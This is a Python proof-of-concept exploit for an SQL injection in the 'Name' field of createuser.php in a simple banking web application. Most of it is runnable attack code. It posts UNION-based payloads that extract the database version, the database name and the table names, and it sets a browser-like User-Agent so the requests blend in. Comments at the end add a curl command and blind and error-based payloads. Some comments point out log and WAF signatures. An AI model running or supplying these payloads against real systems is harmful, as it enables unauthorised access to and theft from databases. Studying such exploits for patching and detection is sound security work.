# CVE-2025-11357 - Simple Banking System SQL Injection PoC
# Vulnerability: SQL Injection via 'Name' parameter in /createuser.php
# Author: Security Researcher
# Tested on: Simple Banking System 1.0
import requests
import sys
# Target configuration
# Default target; the __main__ block below replaces it with argv[1] when one is given.
TARGET_URL = "http://target.com/createuser.php"
# Attacker credentials (low privilege required)
# Placeholder session cookie. Every request in this file is sent with this
# PHPSESSID, so the PoC exercises only the logged-in /createuser.php path;
# presumably the page rejects unauthenticated callers — not shown here.
SESSION_COOKIES = {
    "PHPSESSID": "your_session_id_here"
}
# SQL Injection payload targeting the 'Name' parameter
# Payload: Extract database version via UNION-based injection
# The injected SELECT supplies four columns (1, version(), 3, 4) and the
# trailing "-- -" comments out the rest of the original statement.
# Detection note: this literal appears verbatim in the POST body's Name
# field, so it is a direct request-log / WAF signature.
PAYLOAD = "admin' UNION SELECT 1,version(),3,4-- -"
def exploit_sql_injection(target_url, payload, cookies):
    """
    Exploit SQL injection in the Name parameter of createuser.php

    Sends one form-encoded POST to ``target_url`` with ``payload`` placed in
    the ``Name`` field and the other account fields filled with fixed dummy
    values, then prints the status code, the body length and a heuristic
    verdict.

    Args:
        target_url: Full URL of createuser.php.
        payload: String submitted unchanged as the ``Name`` field.
        cookies: Cookie dict passed to ``requests.post`` (the session cookie).

    Returns:
        The ``requests.Response`` on any completed HTTP exchange (whatever
        the status code), or ``None`` if the request itself raised
        ``requests.exceptions.RequestException``.

    Note:
        The "may have succeeded" message is only a heuristic (HTTP 200 and
        no substring "error" in the body); it does not confirm that the
        injected SELECT was evaluated.
    """
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        # Browser-like UA so the request does not stand out as the default
        # python-requests agent.
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
    }
    # Data to be submitted - the 'Name' field contains the injection payload
    data = {
        "Name": payload,
        "AccountNo": "1234567890",
        "Address": "Test Address",
        "Phone": "1234567890",
        # Placeholder address; the published value is mangled by the page
        # extractor ("[email protected]") and is only filler for the form.
        "Email": "[email protected]",
        "Password": "password123",
        "submit": "Submit"
    }
    try:
        response = requests.post(
            target_url,
            data=data,
            headers=headers,
            cookies=cookies,
            timeout=10,
            # TLS certificate verification is disabled; requests emits an
            # InsecureRequestWarning for each such call.
            verify=False
        )
        print(f"[+] Status Code: {response.status_code}")
        print(f"[+] Response Length: {len(response.text)}")
        # Check for successful injection indicators
        # Heuristic only: a 200 without the word "error" is treated as a
        # possible success; the response itself is not parsed.
        if "error" not in response.text.lower() and response.status_code == 200:
            print("[+] SQL Injection may have succeeded!")
            print(f"[+] Response snippet: {response.text[:500]}")
        else:
            print("[-] Injection attempt may have failed")
        # Returned regardless of the verdict so callers can inspect the body.
        return response
    except requests.exceptions.RequestException as e:
        # Connection/timeout/HTTP-layer failures are reported, not raised.
        print(f"[-] Request failed: {e}")
        return None
def enumerate_database(target_url, cookies):
    """
    Enumerate database information using UNION-based injection

    Issues two further calls to ``exploit_sql_injection`` with the same
    four-column UNION shape as ``PAYLOAD``: one for ``database()`` and one
    for the table names of the current schema from
    ``information_schema.tables``.  Output is whatever
    ``exploit_sql_injection`` prints; the responses are not returned.

    Args:
        target_url: Full URL of createuser.php.
        cookies: Cookie dict forwarded to ``exploit_sql_injection``.

    Returns:
        None.
    """
    # Extract current database name
    payload_db = "test' UNION SELECT 1,database(),3,4-- -"
    print(f"\n[*] Extracting database name with payload: {payload_db}")
    exploit_sql_injection(target_url, payload_db, cookies)
    # Extract table names
    # Reads information_schema.tables; like the other payloads, this string
    # is sent verbatim and is readily matched in request logs.
    payload_tables = "test' UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"\n[*] Extracting table names with payload: {payload_tables}")
    exploit_sql_injection(target_url, payload_tables, cookies)
if __name__ == "__main__":
    # argv[1] overrides the default target URL. This runs at module scope,
    # so rebinding the module-level TARGET_URL needs no `global` statement.
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] CVE-2025-11357 - SQL Injection PoC")
    print("=" * 60)
    # Run basic injection test
    # Single request with the version() payload; the Response it returns is
    # discarded here.
    exploit_sql_injection(TARGET_URL, PAYLOAD, SESSION_COOKIES)
    # Optionally enumerate database
    # enumerate_database(TARGET_URL, SESSION_COOKIES)
# Alternative manual curl command:
# curl -X POST "http://target.com/createuser.php" \
# -d "Name=admin' OR '1'='1'-- -&AccountNo=12345&submit=Submit" \
# -b "PHPSESSID=your_session_id"
# Time-based blind SQLi alternative payload:
# Name=test' AND SLEEP(5)-- -
# Error-based SQLi alternative payload:
# Name=test' AND extractvalue(1,concat(0x7e,version()))-- -